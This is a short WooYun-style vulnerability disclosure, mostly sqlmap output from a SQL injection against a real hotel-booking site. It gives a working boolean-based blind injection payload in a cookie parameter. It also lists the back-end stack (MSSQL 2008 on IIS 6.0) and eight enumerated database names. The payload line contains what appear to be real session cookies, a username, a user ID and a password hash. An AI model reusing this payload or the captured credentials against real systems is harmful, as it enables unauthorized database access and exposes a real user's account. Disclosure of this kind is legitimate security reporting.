WooYun.org

放到sqlmap里跑，毫无压力
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ASPSESSIONIDAQBDRBCS=LBCFGGDCJJDNBFBKAFJLDJAO; S0Oz_20eb_saltkey=dpzTu77i; S0Oz_20eb_lastvisit=1427459395; S0Oz_20eb_sid=x711zC; pgv_pvi=6822079425; pgv_info=ssi=s1363428688; Referer=http://union.zhuna.cn/; login=login; ZhuNaUserName=15017512337; ZhuNaUserID=7170608; ZhuNaPassWord=ea3f2951e30f0584; S0Oz_20eb_lastact=1427466253 api.php js; safedog-flow-item=073B67548420D14D0CC822F81DD5EA5E; tjid=; webname=baiii; sxid=; AJSTAT_ok_pages=21; AJSTAT_ok_times=1; Id=6 ) AND 4752=4752 AND (2853=2853
---
[23:32:56] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[23:32:56] [INFO] testing Microsoft SQL Server
[23:32:56] [INFO] confirming Microsoft SQL Server
[23:32:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[23:32:56] [INFO] fetching database names
[23:32:56] [INFO] fetching number of databases
[23:32:56] [INFO] resumed: 8
available databases [8]:
[*] global_hotel
[*] hotel_9tour_cn
[*] master
[*] model
[*] msdb
[*] tempdb
[*] www_zhuna_cn_jipiao
[*] www_zhuna_cn_yufu2
目测数据还挺多的~